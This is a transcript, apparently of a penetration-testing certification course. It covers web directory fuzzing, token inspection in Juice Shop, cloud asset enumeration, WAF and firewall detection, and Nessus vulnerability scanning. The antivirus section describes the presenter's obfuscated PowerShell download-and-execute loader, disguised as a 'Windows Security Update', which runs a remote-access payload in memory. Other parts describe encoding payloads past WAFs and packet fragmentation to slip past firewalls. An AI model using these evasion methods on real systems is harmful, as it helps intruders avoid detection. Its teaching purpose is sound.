dirbuster's word list, it is here. If you run Kali, this is where it exists. User share word lists, and there's a dirbuster area. You can see there the dirbuster. This is a good list right here. Directory dash list 23 medium. Usually a very thorough list. If you've got the time, you're doing a full scan. That medium list is very good. We're gonna do a little shorter one. So we're gonna use dirb's list, and I think they have one called common. There you go, common right there. That's a small and big. Right. So giving you kind of some different options. We will go with the common.txt file, and then if you want to, you can output the results. We're gonna hit go, and you can see it found these different directories. We have server status, we have index.html, we have .htaccess, .hta, .htpassword, so on and so forth, and it gives the status codes that came back. So these are all like permission denied. So 403s only had 1,200, which was index.html. I can continue to further go down any other directories that I might find. Server status, I can fuzz out more directories in there. Dirb is pretty similar in the way that it works. So you just do a dirb, you tell the site http ://192.168.241, thank you, 43, and then the word list user share word list dirb, and we'll do common again. Fire off, and it's kind of doing the same thing. Runs a little bit slower than GoBuster. You can see GoBuster was really quick. And of course, the larger the word list you feed it, the slower Dirb will be in comparison to GoBuster. So I kind of default to GoBuster. But Dirb is definitely helpful from time to time. Just you never know what one can do versus the other.
So where does the idea of tokens tend to fit into this whole realm of web and cloud?
So we use tokens a lot nowadays, and when you are trying to, enumerate, gather information, learning about the token situation in any of your web apps is going to be super helpful because we use them a lot for authorization and access. So that sounds like good stuff. And if there's anything interesting in it, or if I'm able to gather tokens, at least even the understanding of how the token system is working can be helpful to us as we work through it. Right? So let's see. We're going to talk about scoping. Right? What's the scope of the token? What kind of access does it give me? Where can I go? What can I do with it? Kind of thing. We also have issuing verification. So how are they issued? How does one obtain a token? And how long does that token last? Does it auto revoke, or is it what's it looking for here? Where if you leave the site, does it then automatically say, okay, now that token has been is no longer, you must get a new token to play the game yet again. So you need to keep these ideas in mind as you look through tokens and try to look at them. I can actually bring one up. Let's go back over to our website here. We've got OWASP Juice Shop running, and I am logged in. So if I'm gathering information with Zap, where did Zap go? I'm just close it. Oh, we'll bring up Burp Suite. Here. Well, you can just kind of like get a look at both of these interfaces, play around with them a little bit, see what's going on. Oh, there's a WASP app. Close you out there, WASP Zap. Okay, yeah, no, it's okay. Close that down. If we want Burp to do this, where's your Burp? All right, so first thing I'm going to do is turn this proxy off because it's going to make things difficult. I'm just going to go to this HTTP history area, and now I'm fiddling around inside of Juice Shop. If I'm looking at this ticket, or if I'm moving to a different area, maybe customer feedback, I'm logged into the system. You can see my accounts. I'm logged in with tester, going to my order history, I can look at things like that. If I go back to Burp Suite, it should be grabbing all this, but you can see that it's not. No proxy listener screen will enable those bad boys. Let's see here if that does the trick. It might be because I had Zap running it in conflict, trying to use the same port, trying to do kind of same thing. I just have to restart the system there real quickly. But let's all you want to do is log out. And then I'll log in. Let's see if that's grabbing. Yes, it's grabbing things. We like it when it grabs things. And we'll put our email in tester@example.com, and tester is the password. Get logged in. And now when we go back, we can see here was the login post right here. And down below, I can see that information. Of course, if I can make it usable for us. And there's that information that got passed. That was the post request. Now, what happens once we get logged in? You can see it's running this like, who am I? You see this bearer token. There's the token. So I need to look into that. This is obviously using JSON web tokens. Could be using OAuth, things of that nature. I want to start learning more about those tokens. Again, what's the scope? What's the replication? What's the issuing look like? What's going on? We did see that it kind of runs this who am I query, and then there's more about the API, things of that nature. We'll get more details on that in just a moment here. Just, I guess it's a good time to start talking about that. Capturing those API and requests and responses obviously is really important. I can look at this specific request and then check the response to see what kind of information comes back. You can see that it returned the fact that it knows my ID, which is 21. That's interesting information. I didn't know anything about that until I looked at this response. Then I had this email. Okay, that's my email. So this is information that token is verifying about me. That's coming back in this response from the ones that are in the application. So understanding that, getting profile images, where it's coming from, access to public images, uploads. Maybe that's a useful tidbit of information about this web application that I can use down the road. If I'm able to upload to the site, I now have a decent idea of where that upload might go to because it's called asset to public images uploads. Can I upload anything I want, or does it only take pictures? How do I work with that? These are the ways your mind should start working. We see things like this in the web application. We got last login IP undefined. So just some interesting things coming back. Of course, I want to go through every one of those things, looking for information such as this to learn more about that. Another thing you can do is sniff web traffic. That's the word I'm looking for. I'm looking at my own web traffic, which is fine, and I should be looking at that. Can I sniff anybody else's web traffic? Have I enabled some sort of man in the middle going on? Maybe I'm sitting at a coffee shop with an evil wireless device going on that people are using and logging into websites with. Right? I can definitely sniff web traffic that way, and it's something that we want to do to learn more about credentials and tokens and things of that nature, so that we can set ourselves up for further attack, actually gain some access. So understanding that we need to be able to do that is an important part of doing enumeration and discovery, especially when it comes to web traffic and services.
All right, Daniel, when we start talking about that just a little bit more, is there anything else that we need to add in here, such as any type of thing specifically for like cloud assets?
Yeah, cloud assets also really good because we use the cloud a lot nowadays. And when we say cloud assets, we're talking about, okay, if my site uses cloud at all, so let's say we're in AWS shop, because that's the thing I'm familiar with. It could be Azure, GCP, whatever, right? If I'm using that, how am I using it? Is there infrastructure that I'm connecting with? Am I using something like S3 buckets, which is basically just online storage? And then so how am I accessing that? How do I know what cloud assets are being utilized by my targets? Well, we just start looking with our eyes. You can do some manual discovery, start to kind of like when we look at that DNS information, we notice that kind of resolves some AWS stuff, I guess ITProTV. So that kind of hints toward the fact that we are using cloud in some way, shape, or form. But again, we're going to heavily rely on automation. So let's kind of jump in there and take a look at that. I've got this. Actually, I'm going to have to change the VM setting, that network adapter back bridge, so I can get online. We'll go after ITProTV again. It takes just a second here before. Not seller clear. And we're back. All right, so it's just changing networks really quickly. And we'll run this cloud enum tool that I've got. Really cool. All right, so you just type in cloud _enum. I just tab completed. And my favorite option, dash help, because it's dash helpful. And here we do all the options available, kind of helping us out. All hell OSINTs. You're darn right. Let's see here. So we have keywords we got to throw at this thing, or key files. So instead of having all on your line, you just need a file with keywords you want to look through. What kind of mutations? It has the defaults. Always love the defaults. We got some brute forcing. List of brute force Azure container names. That might be how this. That's like nice to have. Not only Azure, because I think this does. Azure, AWS, and GCP. So it's going to be going after that. Or you can disable any one or multiples of those as you try to do this. But you start this tool off, give that keyword you're looking for, and it's going to start scraping the internet. Be warned that might take a hot minute. And make sure you do it on things you have permission to do it on. We don't get in trouble out there. And don't forget to look for third-party hosted services as well. Are there any connections being made? Just looking at network traffic, you see any connections happening from there. Look at the web applications that you're connecting to. Are they reaching out and grabbing anything from a third-party host and pulling that information back as part of that? So it could be helpful. And there are thinking things like OAuth, right? That's a third party doing authorization for you. Can be super helpful. Anyway, There you go. A lot of web-based assets, cloud-based assets for us to look through and discover. So definitely make sure you're familiar with those and have a good working understanding of the tools that we're using.
All right, well, that actually gives us a lot to actually consider and, of course, to be able to practice as we continue on in pen testing. Remember that assets not only lie on premises, but they do lie in the cloud as well as on different sites. So let's review those key points as we close out this episode. Do not forget, Daniel took us through the idea of domain brute forcing, as well as directly fuzzing, the ability to actually take a look at tokens and some of the different things that are actually involved in that, as well as APIs, and, of course, cloud assets. All these are going to be important places where we will go and try to find more information that will help us during our pen test career as well. Well, that will wrap it up for us. Thank you again for joining us, but there is more pen test plus to come, so make sure you stay tuned. How does the penetration tester go? That's right, you are back with our private investigator show. I'm joking. We are now working with the Pink Panther himself, Daniel Lowry, as we begin to do some detective work.
Cue my music.
And, yes, and to actually learn how to avoid some of these different detection systems. Daniel, this is an important part of what we really have to do if we're to actually get down to, to actually being able to prove that this can be done, right?
Yeah, it's kind of funny. I actually got contacted by somebody on LinkedIn the other day saying, hey, I could really use your help with some advanced firewall avoiding techniques. And I'm like, I don't think I'm going to do that. Or, these are going to be more basic firewall and others, techniques for avoidance detection. But that is obviously something that we have to look out for. Like, there's hopefully, if we're doing a penetration test, it is to confirm that the defenders of said systems that we're going after have done a good job. And if they haven't, we can find some of those weaknesses and help them reinforce those security controls so that these things stop working. That's the whole idea. I don't know if you knew that or not. That's an important little fact of why we're doing what we do. And looking at these defenses and seeing if we can bypass them is a part of that, because we can, and we have some work to do on the defensive side of things. So this is, like Ron said, a really important episode. It's kind of interesting as well, at least from my perspective. So hopefully you find it interesting as well.
All right, now, Daniel, first on the list is something that I thought I was confused about in terms of defenses here, and even security. The first time I heard about this, I was kind of saying, I don't know how that actually fits into security, but you're going to tell us that load balancers are part of the defense system. Help us out here and how we test.
I'm going to give you a good reason why I called out load balancers here in this episode on defensive mechanisms, because CompTIA puts load balancers in their objectives as a defensive mechanism. Now, maybe they're looking at it from some perspective that Ronnie and I just aren't that, and that's fine. Maybe through the idea of
keeping systems up.
Yeah, there you go. Yeah, like that. There you go. So it can withstand denial of service attacks a whole lot easier. That's a definite use for load balancing. A lot of times it's just meant because our own actual traffic might be too much for one site, one system to withstand. So we typically see load balancing done on today's modern applications. So that said, yeah, we can definitely look at it that way. But what do we need to do? How do we detect that? Very difficult, actually. I say that. It can be, right? Because think of the nature of load balancers. They're meant to be seamless. They're meant to just make you think. I went to www.whatever.com. It doesn't matter. There's 7 different systems that are running that, and you might get one or the other or combination as long as you get it. That's what you want. That's what you want to see. You have to go to 1 and 2, 3, and 4, and so on. You just go to one place, and the system as a whole gave you what you need. So again, it can be very difficult to detect. Not impossible. We've actually kind of touched on this already when we talked about DNS, right back in the DNS episode. Because if you recall, let's jump back and let's do a little NS lookup action, shall we? If I do NS lookup of ITProTV. I'm horrible at this. There you go. Remember, we saw multiple IP addresses come back from that. As you recall, I think I said, looks like we're probably doing some sort of load balancing. Hey, we've probably detected load balancers. And if we further enumerate that, we see it goes to AWS, and okay, this is AWS and stuff. Well, AWS doesn't have load balancers if you know anything about the systems. So there you go, right? That's one way to attempt to discover that this is going on. Another tool called WAFWolf can do this. We're going to take a little look at WAFWolf here in just a second. So I'm going to hold off on the demonstration. We'll use that here in just a minute, which is more toward its namesake of looking at something. But it can discover the idea that there is load balancing happening, kind of elucidate that to you. And if we do see that in our results, that'll be very interesting. We'll 1-2 punch here in just a moment. You can also use Nmap to do this, or look at HTTP headers. Because sometimes when you're doing your banner grabbing through Nmap, the actual idea that if I have load balancer will come back if you're doing versioning operating system discovery. That stuff can be in that information. So as you're looking for the information and as you're targeting doing more active scanning, you might see something that talks about giving the label of this is a load balancer. You are using some sort of load balancing software and or hardware. So just keep that in mind. Those tools are out there. They can help you with that. But ultimately, we just want to see when it comes to avoidance. I mean, I have one IP. I guess I could avoid using the load balancer by going directly to the specific IP that I pulled out of the load balancing pool. But maybe that's something you want to do from time to time. I can't think of any use case of it off the top of my head.
All right, now, Daniel, you have web application firewall as one of these also defenses that we have here. Now, it might have been a while, let's just say a few months, maybe even a few years since we've been through that security plus track, and now we're getting back into it. And I remember that there were firewalls, but what is in a quick summary, web application firewall as a defense mechanism?
Oh man, so I really love tools that are things that are self-explanatory, and Ronnie kind of laid it right out there. Web application firewall. So it's a firewall that's specifically geared toward blocking and directing traffic that is going to and from a web application. So it's looking at the traffic that's being sent, that wants to hit the web application and goes, do I see anything that looks fishy here? And it kind of has a set of rules and signatures of things that it is known to be, well, we don't like, So that's one thing. So if we are coming at this as a penetration tester, then we need to know whether or not we're hitting a web application firewall, because that might stop us from actually being successful at certain types of attacks. So how do we do that? Right? What do we do? Well, we have some tools. As I mentioned before, there's a tool called WAFWolf. WAFWolf helps us know whether or not, or at least it attempts to let us know whether or not we're hitting a web application firewall before we actually start touching a web application. And that can help us here in just a minute when we talk about avoidance. Let's take a look at it here. Clear the screen, and you just type WAFWolf, wolf, which is 2 zeros. And you can say, oh yeah, you didn't give you a target. But it's pretty straightforward. You can also do the dash help option, as you know how much I love, which will give you obviously a list of more useful options. We've got enable verbosity. We can get much more verbose on that output, and that might be very helpful. You never know. The devils are usually in the details. So increasing verbosity can make it difficult to parse through in a lot of different tools. I don't know if that's true with WAFWolf off the top of my head, but it definitely will have that information. You'll just have to sift through and make sure that you find and see if there's anything useful from that. It says find all WAFs which match the signatures, and stop testing on the first one. So maybe there are multiple WAFs that are being used. You don't want to stop and you find that first one. You want to keep going to make sure that we've enumerated all WAFs on our targets. No redirect. We got some different testing, input files and output files. So specific information you want to feed it. If you're using a proxy, let me know that. And then we got some version information. I'm just going to fire off whole WAFWolf at ITProTV. We'll see how that works. And notice it's going through the results. It's behind an AWS Elastic Load Balancer. Oh, look at that. Haha, fun days are here again. So it's kind of seeing that as a WAF. Pretty interesting. And maybe, I think the Elastic Load Balancer has WAF capabilities built into it, if I remember correctly. All right, that's really cool. What else can we do? Nmap. Nmap can also detect WAFs. So we clear sudo nmap map dash script, and it will be equals, is it HTTP? That's it, dash WAF dash detect.nse, and then give ITPro.tv. Put an old password in there. Hopefully, only have to type it once. There it goes. And of course, we're going to have to do the appropriate waiting game here. Hopefully, it doesn't take too long. But it does early good job. There we go. Let's see here. We do see some CloudFront stuff. Nothing really coming back with super information. Not scanned. Other addresses. It's kind of letting us know that there are multiple DNS records for this. That might be an allusion to the fact that a web application firewall might be being employed here. Again, Nmap has a very specific use. It has multiple uses. Some of them are better than others, but you never know. That might come back. We do see this going through your All right. What else can we do? We can look at cookies. Cookies might reveal the fact that you're running through a WAF because it's kind of acting as a proxy sometimes, or it can let you know that it's there. It might be a part of cookies. So look there. Look just anywhere inside of the web application traffic. You might find something there as well. So keep an eye on that. And that brings us to detection avoidance. How do we avoid this? Encoding and encrypting information. So if I'm trying to do a SQL injection through the address bar, and it's got that standard 1 = 1 kind of action happening for a SQL injection, that web application firewall is going to go, no. Or it sees those special characters, single quotes, or octothorpes, or script tags for cross-site scripting. it's going to see that stuff and it's going to say that is not allowed. So what do I do? How do I get around that? I can code those with different types of encodings, URL encodings, base64. We got a lot of different ways in which we might be able to find ourselves around whatever the WAF is. Some WAFs are better than others, honestly. And therefore, if it's only a specific list of things that it's blocking for, as long as I can find something that's outside that list, then I can bypass and avoid detection and stoppage by the WAF. So keep those things in mind.
All right. Of course, what should be ubiquitous at some point in just about any network is going to be antivirus. So you can detect antivirus.
Yeah, well, I mean, so I always assume antivirus is installed, especially with Windows, right? If I'm attacking Windows, it's almost guaranteed that Windows Defender is running. So if there's no third party, why turn it off? It's free, it's running, it works really well, does a good job. So I'm gonna go off the idea of assume that there is antivirus running. Ways of detection would be try to upload some malware and see if it gets killed. Does something happen to it? Am I able to then find a connection back to that malware? When I say malware, it's just anything that might have a malicious signature to it. If it's getting stopped and thwarted immediately, it's a good idea that antivirus is going, what in the actual heck is this? No. I'm gonna kill that, and I'm gonna tell my user here that something's going on, and I need to take a look at things. So that's one great way. You can also look for AV related traffic, because antivirus systems tend to update themselves, right? They talk to a centralized server. You start seeing traffic that's, Kaspersky, blah, blah, blah. Oh, okay. Or the IPs are owned by unknown AV. Okay, that's a good indication that antivirus is installed and running, right? So if you have the ability to check secret services, a lot of times this might be post-compromise. I know we're in the information gathering phase. You never know what kind of memos might have been disseminated throughout your organization. So if you come across one, talk about the antivirus solution. That's a great way of detecting the fact that antivirus is running. Maybe do some social engineering to elicit that information out of end users. Oh yeah, my antivirus is running. When you make a change to yours, does it do the same thing that mine does? Oh yeah, it does. I can't stand. Okay, great. Right? Because I'm on version 2.3. Are you still on version 2.3, or did they move you up to? Right? You start to get the idea. Yeah. Social engineering can be super helpful getting information like that out of people. What else do we talk about when it goes to this? I guess detection avoidance, right? When it comes to detection avoidance, I've created some fileless malware. Fileless malware is a great way to get around and avoid antivirus signatures because there is no signature for it if you custom build it. Right? So if you're using off-the-shelf types of attacks and technologies, it's a good possibility you're going to get popped back antivirus. We want to avoid that. So we build our own thing. I've got one here called Update Script. I've used it. It's been pretty successful for me. I can create remote connections to Windows-related machines. And you'll notice I've just got this update script.cmd right here. Got that. And I've done some obfuscations so that the antivirus system will not kick in and stop this. Everyone's kind of swinging that. So I know it's a little weird, right? And because it's obfuscated, it's meant to be weird. There's more weird the better because it also makes the antivirus system go, what is that? Yeah, I guess it's good. It doesn't meet any of my signatures, so pass it on. Let it do its thing, which is what we like. And you'll notice it's running PowerShell, doing a no profile, and then it's running dash as a command, which is IEX, just invoke execution of a new object. Download something from this site on this port called Windows Security Update. Oh, you mean this Windows Security Update? Well, what is that? Cats Windows Security Update, and this is a PowerShell script with more obfuscations going on here. You'll notice here's some like base64 encoded string of text, and if we grab that, copy that. And let's see here, I do a base 64. Oh, I'm sorry, I got echo. Pop that in there, and then pipe that into base 64 and dash D for the decode. We can kind of see what's going on here. Invoke expression, new object. And you'll notice that the upper and lowercase odd things are happening. Again, more obfuscation. This is how we avoid detection by antivirus systems, right? So I'm doing all these things to download this R1 file, which you'll notice is, wait for it, right here, right? So it's downloading these things running in memory. Again, avoiding detection because it's all memory run. There's no files that are really being written to the disk for it to scan and look at, helping us avoid antivirus detection. So these are some things you can do to avoid that.
All right, now that actually leads us to our kind of final little topic here, which is just a regular firewall. So Daniel, what do we need to know about this?
Yeah, firewalls, obviously these are things that we run into from time to time, and ACLs is typically the name of the game when it comes to a firewall. Hopefully I don't have to rehash the idea of firewalls. Right? At this point in time, I think you've got a decent enough network foundation to understand the idea of firewalls. Hey, is this allowed? If so, I'd let it pass. If not, hit the bricks, buddy. Right, that's what it's all about. But how do we detect those things? Firewalking is one way to do this. We have scripts and automation that can do firewalking for us. One of them is called Firewalk. Jump on the computer here, you have Firewalk, and that's just help. Command Firewalk is not found. All right, do I want to install it? Well, absolutely I do. How do I have Firewalk installed? Go. Install the thing. I guess it's doing that. Maybe I didn't have Firewalk installed. And while that downloads and installs, and never mind, we're done. And back to Firewalk. That's help. There we go. Give it the target destination ports and things of that nature. So it's trying to see and map past any potential firewall. And it uses an exceeded time to live value to make that happen. So it's basically saying, look one hop past the firewall, see if you can access that. If not, I'll get an time exceeded error and let me know, oh, there's a firewall in the way because it did actually hit something and it passed it. And there you go. So these are the different arguments you can throw at this, whether you want to do TCP versus UDP, do not resolve IPs, and so on and so forth. I don't have any firewalls to walk past or to work with here, but you get the idea. And map will do this as well. Let's do man. I'll just do nap, I guess. In nap, there is all these ideas of getting. Well, there's actually some scripts. That's what I needed. So the scripts are. I'll do a find /name star.nse so I can find which firewalking scripts we have for grab fire. For nap, you see we got this one, a firewall bypass. Oh, that might be useful down the road. And here's Firewalk right there. If you really want to get the nitty-gritty of what that does, you can user share nmap scripts firewalk.nse. It usually has a description, tries to discover firewall rules using an IPTTL expiration technique known as firewalking, and it gives you a little more information on how that works to determine a rule on a gateway, scanners in the probe to a metric located behind the gateway. You get the idea. Feel free to read on this. Really interesting technique and can be helpful for discovering whether or not those firewalls are there. Obviously, we have a couple of options in nmap as well for, wait for it, firewall IDS evasions and spoofing. Typically going to be this guy right here, fragmenting packets. You make them so small there's not enough information within them to really be discernible as far as an attack goes. So you chop up your packets in little tiny bits. The firewall just passes on by because then they have to be reconnected. They have to be all put back together on the other end. Once that happens, well, it's a little too late now, isn't it? Right? So it's one good way around it. I also like using decoys. It's really cool. Doesn't mean you're not going to get seen by the firewall, but you'll be kind of lost in the shuffle as there's all these different decoys that are going. Which one was the actual bad guy here, right? So I'll get you around some like IDS stuff. Firewalls, depending on the type of rules, that might be so useful. But there you go. We got a couple things you can use there. Like I said, fragmentation. Maybe use a proxy that's allowed if they're blocking your specific IP or wherever your IP is from. That might be on a disallow list, and therefore you're getting blocked. You find your proxy that's in an allow area, and now you're fine and dandy. Go down every time. So just some of those things can help us circumvent those security controls out there that would stop us from doing our job.
Thank you, Daniel. That was quite a bit of information, but let's make sure that everybody got all of that down. So as we review here, we did take a look at load balancers, WAFs, web application firewalls, and antivirus, as well as regular firewalls. All these are actually great different detection tools that we also have to be able to understand and know what is happening there, and using tools to actually help us to bypass some of those things as well. Well, that will do it for this episode, but there is more to come. You don't want to miss a single minute of it, so make sure you stay tuned. What is vulnerability? That's right, you're joining us once again, and we are glad that you're actually here with us as we get started taking a look at the idea of vulnerability scanning. And you have Mr. Daniel Lowry himself to actually help us through this particular aspect of it. So, Daniel, when it comes down to the idea of vulnerability scanning here, this sounds like it should be easy. I mean, it's just scanning.
It is just scanning, and what's funny is when back when dinosaurs were on the earth, I got into security even a little bit and started to think that might be an interesting topic of conversation. Is the scanning I thought was like this magic thing?
Yeah,
right? You ran a scan and said here's the vulnerabilities, hack them. Go for it. And you go okay, but the other part of that is that you have to know how to hack those vulnerabilities. Right. So scanning is great and it is a completely necessary thing. And some of the scanners are actually really good at going, oh yeah, I did hack it. You can hack it too if you like, but I did it. It's in the report if you know that kind of thing does occur. So it's kind of funny that those things will do that, which is nice because if I just want to create a report and it has all the information in it, I can deliver that and I've got something for my client. But if I want to go further down the rabbit hole, I do need to be able to finish that out and do those things myself. I'll talk a little bit about that, kind of show that as work this. But today we're really going to focus on what vulnerability scanning is, what the different types of scanners are out there, some of the techniques that are used in that. So it will be good. It'll be good for us because not every scanner is going to be exactly the same. Some of them will be different and they'll have different requirements depending on your clients. So you need to be familiar with your scanners and how you can customize them to your client's environment. So that's what we're going to take a look at today.
All right, so Daniel, let's start with that very question stuff. Because somebody might be watching, I thought I knew what it was, but help us to define it, and also what are some considerations for us to get started in doing this?
Oh yeah, no problem. So a vulnerability scan is very descriptive in its term, right? It is going to scan a system and or network for known vulnerabilities. And that is important, right? Scanners only know how to scan for things they know about. So you're going to make sure that it is updated all the time, especially right before you start scanning. That will be a good time to update your scanner so that it has the latest and greatest of known vulnerabilities that whatever organization you've purchased or gotten your scanner from knows about, that your scanner's ready to rock and roll for that stuff. So make sure that you get those threat feeds, scat data, whatever the heck it's going to be ingesting into the scanner itself, that has been updated. That is always rule one when it comes to this. Once that is done, you're ready for a scan. And so Ronnie's question is going to look for those vulnerabilities. It's going to say, hey, okay, let's see what you got. It's kind of honestly, it is kind of automating a lot of the heavy lifting of information gathering. Okay, you got a scanner, it does all this stuff, it's built in. You've paid a good amount of money for it, most likely if you're doing this as a profession, and therefore you want the easy button on this. And most of them kind of give you that, honestly. The hardest part is to make sure that the thing is updated and running correctly and isn't breaking on you. And not that that happens all the time, but it does. You got to be familiar with how to deal with that if that happens. But the scanner itself is kind of fire and forget. Now, that said, you did mention considerations. Right? There are many considerations when it comes to a scan, and that's going to again depend on your client. So let's jump into my computer real quick and let's take a look at a few of those considerations. Let's see what's going on. I'm going to bump this up. It's just running on a web browser here. So actually, the server is installed on this Windows machine, and you gain access to it via a web browser. Pretty straightforward. Nothing. So this is all next. So all our dashboard here is just through the web. Now, I've got some scans I've already run, but that's not exactly what we want to do right now. We're going to look at some of those considerations as Ronnie says. I do like that. So we're going to hit the new scan button. This is going to give us that new scan option. Right, and here we have a bunch of different scans that we could run. Right, we've got vulnerability scans, we've got discovery scan, and remember, as we've been kind of talking through this whole portion of the series, this is about information gathering. Right, this is what we want to do. What hosts are out there? Are they alive? What are they running? Are there any openings to them? If so, what is that running? And so on and so forth. This again kind of brings in that easy button for that. Actually, easy button. So when I do host discovery, click on host discovery, and then after you click it, you get this little enable option here, which you can see is not so. I'll say enable it. Hey, I can now change the schedule. And this is important for your clients because maybe you want to run scans daily or just once or weekly. However, it's going to work out that you need it to run. Maybe I want to run daily like that. And I can say this is when it starts, and I can say, well, you guys probably don't want me running during production hours, so let me find. You'll notice this is in like crazy time here. So I guess I'm going the wrong way. Let's do like 2 o'clock in the morning, and it starts on this day, and you're good to go. Make sure you check your time zone. I do find it interesting that you have this repeat and frequency. Last time I checked frequency and repeating was the same thing.
Just about, but here I guess you're saying you could run every day or you could probably run every 2 days if you want to turn to the repeating cycle.
Oh,
Maybe.
okay. So run on the days that it repeats.
Yeah.
That's confusing. But hey, you gotta learn your scanner, right? What are you gonna do? And again, this is the only game in town, so if you don't like Necessary, that's what we're running, then try OpenBuzz or what else? AccuNex is another one I think is a good scanner. There's a bunch of them out there. Go crazy, find one you like. As I always say, this is not a set in stone if you're not running Nessus then. How do you live? It's not like that. Each one of these things have their own pros and cons to them. You just have to know your scanner. So the settings that you're seeing here are not going to be the same, identical to what you would find in something like OpenBuzz, but there should be something similar as far as scheduling because that is an important consideration for us as we do set these things up so that they do run.
So when it comes down to the beginning of the scans on this, are we just looking for every vulnerability or can we target it to something like a protocol?
Yeah, so protocols would be another good consideration because maybe they're running a specific protocol that they want you to scan against, or they don't want you to scan against other protocols because they're not relevant to them, or something like that. But yeah, you would want to, if that were a consideration, and sometimes it is to say, hey, this is the type of protocol I want you to scan. Now, it's easy to just think, well, TCP or UDP, right? And that is true. Those are protocols that you would want to utilize as far as a scan. But don't forget things like HTTP and NTP, right? It goes beyond just the networking protocols into application protocols and so on and so forth, right? So those are what we're talking about when we say to consider the idea behind different protocols and what you wish to scan. So this scan might just be specifically for a web application. Right. I just want to scan HTTP. There you go. I'm good to go, right? So just keep those considerations in mind. Another one would be going back to the network idea is network topology. Maybe we have a segmented network, and I want to scan a specific portion of that network. I would input that information into the system wherever that may be, and set that appropriately. So here's my IP range that I wish to scan. Right here's the CIDR notation for that. Was a lot of times what they tell you. And I think in here, so if we're doing host notation, we've got basic select general. We can put a description in here, which is helpful for after the scan runs, or if you want to save the scan for future use and run it over again. Let's see here's under discovery, scan types, host enumeration, and you can see it's pinging using TCP, ARP, and ICMP general. And then if we did, you can do port scanning, but we're just focusing on host enumeration. Where is the? I guess it's in basic. That's where the there we see targets. There it is. It's hiding from me in plain sight. And in here, you can see that it's kind of light gray. I'm trying to pull that in so we can see it. It gives you some examples of what this might look like.
The range.
Yeah,
looks like
it's really helpful. There's CIDR notations. I want to do a whole block of IPs. I'm good to go. Set that information, and it even uses domain names. So nice, right? It's very choice. Nessus is one of the more well-respected scanners on the market, so you could do worse. Let me put it that way, right? You could do worse. And since they have this essentials version, which is free to use by individuals, you can get some hands-on with this. If you like, download the essentials, get you an activation key, and go to town. You can up to I think like 16 IPs. So actually pretty good for small shops or just people trying to learn. I highly recommend working on Nessus. It is nice. All right. Now that comes into play, let's talk about bandwidth limitations here, right? This is where you might want to throttle back. Because Ronnie, correct me if I'm wrong, but not every network has like OC connections to everything.
That is true, yeah. You might have some that are actually really on slow connections or shared connections as well, which means that you have a bandwidth utilization issue, which your scan could probably even choke a little bit harder.
Absolutely. Depending on how fast you're sending this stuff. If a man's network here, he might get a little uptight about that and go, I appreciate that you're scanning our network and we really enjoy what you're doing, so get me wrong, but no one can use the network because your scanner's going crazy and we're having a hard time dealing with that. So bandwidth utilization is a huge factor for us to take into play. You need to consult with your clients and say, what kind of bandwidth are we working with here? What's your network look like? How much can it handle? And then we as the security professionals will make sure that we can fit these things into that pipeline, as it were, right? That we're not going to choke them out. And this kind of does come into the idea of query throttling, which is also has kind of a twofold thing where that will help us with the bandwidth limitations because we're not slamming them with so much different queries, right? It's going through at a nice even pace, keeping that bandwidth available for his users. But also, if we're looking to do detection avoidance, right? Slowing scans down is a great way to do that because many IPSs, IDSs out there will detect flooding of information and scanning information that's coming in at a fast rate because scans are meant to be fast and automated. But if we're really doing some type of true threat emulation, we're trying to fly under the radar a little bit, maybe like throttling that down and only making so many queries per would be a great way. Same thing if something like Nmap has that capability of really slowing that speed down or needing to do fragmentation, which Nmap does have vulnerability scanning capability. It's not robust, but it is there. So that might be the vulnerability scanner you are using. We're using something that's full-fledged like Nessus, which incorporates Nmap, but you could be using an Azure vulnerability scanner as well. It's kind of the other way around though. Nessus is a vulnerability scanner that uses Nmap to find ports, and Nmap is a port scanner which has some vulnerability scanning capability. So it's really just an odd difference of looking at things. Maybe use both, right? Let's say you can't. Well, unless send your statement of work or something, then you got to exclude those things. But there you go. Let's get things. I want to say that there is some functionality in here for that. It's probably, let's see here, and maybe advanced. Yeah, here you go, performance options. Right, this is where you're going to say, hey, I'm going to go ahead and slow that scan down when the network congestion is detected, which is kind of an awesome feature. We're able to detect whether or not it is a congested network and start to throttle itself back. And of course, then you can kind of set that, how that works, and that's going to do with that. So there you go. That's going to be that. Anything else we want to talk about this, Ronnie?
You have something about fragile systems. What does that mean?
Good point. Thank you for bringing that up. Fragile systems are very important. Kind of talked about that just a hair when I said, hey, maybe some of these systems can't handle all that traffic. And it could basically denial service them, right? That's not necessarily a fragile system, but think more of systems that have weird third-party line of business applications that if you were to scan them, they could actually fall over. They don't know what to do with that information. They weren't built to handle that information, and that scan information could come in and actually crash the system. That is a fragile system, right? And we do not want to be, we're not in the habit of taking down our client systems. We're in the habit of trying to find vulnerabilities and weaknesses that we can help them mitigate, right? So if you're just firing these things at systems, you're not taking into account, hey, do you have any weird systems that might not fare well if we scan them with automated scanners? Maybe do a little more of a manual approach on them. We'll exclude them from our range of targets that we're looking for so that they don't get scanned, they don't get bothered. Like I said, go those manually. That's a list you want to compile before you start these scans. Because you scan that and it goes down and you've broken it. That does not bode well for you as a professional, and you're gonna have some of your clients on your hands, especially if that's like a mission critical system. I'm thinking more along the lines of like ICS and SCADA systems, which are really temperamental a lot of times because they're older. They can't handle the things that we can throw at them nowadays. They're more robust than modern systems could deal with. You might find yourself in those waters. So just be aware that those fragile systems do exist. And then last but not least, I think we have non-traditional assets. Any venture guess what we mean by non-traditional asset?
I'm going to assume some type of customized line of business.
Absolutely. That's a great answer to that question. You could have built something that's a custom system, it's a one-off, right? You have some engineers come in, devise this really cool system that does X, Y, or Z, and it's networked in the system. We got to check that, right? It's got to be on point with that. Other things would be like IoT, right? So you're bringing in IoT systems. These are non-traditional systems. I think in the medical realm as well, they have these very specific medical devices that are networked and are on part of the system, but they're not traditional per se, as you would see in they're not in the IT team specifically wheelhouse. IT is, if anything goes wrong, you're probably calling that organization's tech support to come in and fix it because it's a non-traditional system. You don't have really understanding of that. It would take a specialized person to do so and doing dealings with that. We do want to take that into account. Hey, are we scanning that? Are we not? Can handle that? Do we want to label these fragile? Or how do we want to work with this? Got to take those again. Considerations, great word. I like that because that's what we're doing.
All right, so then having that in mind, now that we have the targets there, what are we actually doing with it?
